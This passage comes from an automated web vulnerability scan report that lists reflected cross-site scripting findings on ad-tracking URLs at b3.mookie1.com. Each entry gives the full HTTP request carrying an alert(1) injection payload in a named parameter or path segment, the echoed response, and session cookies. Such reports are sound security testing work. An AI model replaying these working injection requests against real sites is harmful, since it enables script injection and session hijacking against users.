var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection=
...[SNIP]...

1.182. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc403'-alert(1)-'00d23fdccb5 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxisfc403'-alert(1)-'00d23fdccb5&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2088
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxisfc403'-alert(1)-'00d23fdccb5&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var x
...[SNIP]...

1.183. http://b3.mookie1.com/2/TRACK_Xaxis/1138219538@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1138219538@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84aac'-alert(1)-'f6bd1f4c180 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact&84aac'-alert(1)-'f6bd1f4c180=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2035
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact&84aac'-alert(1)-'f6bd1f4c180=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.184. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46009'-alert(1)-'822e3ab837b was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact46009'-alert(1)-'822e3ab837b&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2026
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
rnal preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/contact46009'-alert(1)-'822e3ab837b&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?mig
...[SNIP]...

1.185. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dddc5"><script>alert(1)</script>91d81038683 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxisdddc5"><script>alert(1)</script>91d81038683/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxisdddc5"><script>alert(1)</script>91d81038683/1467176220/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.186. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 109e4"><script>alert(1)</script>3580b23baea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1287345012@x54109e4"><script>alert(1)</script>3580b23baea?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/246370945/x54109e4"><script>alert(1)</script>3580b23baea/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.187. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [Section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83ac8'-alert(1)-'ce978602c8 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact83ac8'-alert(1)-'ce978602c8 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2025
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ge();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact83ac8'-alert(1)-'ce978602c8';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.188. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7e05'-alert(1)-'e49792042cb was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/workd7e05'-alert(1)-'e49792042cb&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2026
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
mageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/workd7e05'-alert(1)-'e49792042cb&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection=
...[SNIP]...

1.189. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71060'-alert(1)-'712ff9b2854 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis71060'-alert(1)-'712ff9b2854&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2082
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
oes not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis71060'-alert(1)-'712ff9b2854&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxi
...[SNIP]...

1.190. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69ab5'-alert(1)-'a7b748156b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact&69ab5'-alert(1)-'a7b748156b5=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2029
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
e();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact&69ab5'-alert(1)-'a7b748156b5=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.191. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [&_RM_HTML_url_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a911'-alert(1)-'3be89f1d937 was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers3a911'-alert(1)-'3be89f1d937&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
l preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers3a911'-alert(1)-'3be89f1d937&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?
...[SNIP]...

1.192. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 776cd"><script>alert(1)</script>b491570cc00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis776cd"><script>alert(1)</script>b491570cc00/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis776cd"><script>alert(1)</script>b491570cc00/1104678151/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.193. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f058"><script>alert(1)</script>b51d3fd442a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1295399308@x547f058"><script>alert(1)</script>b51d3fd442a?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
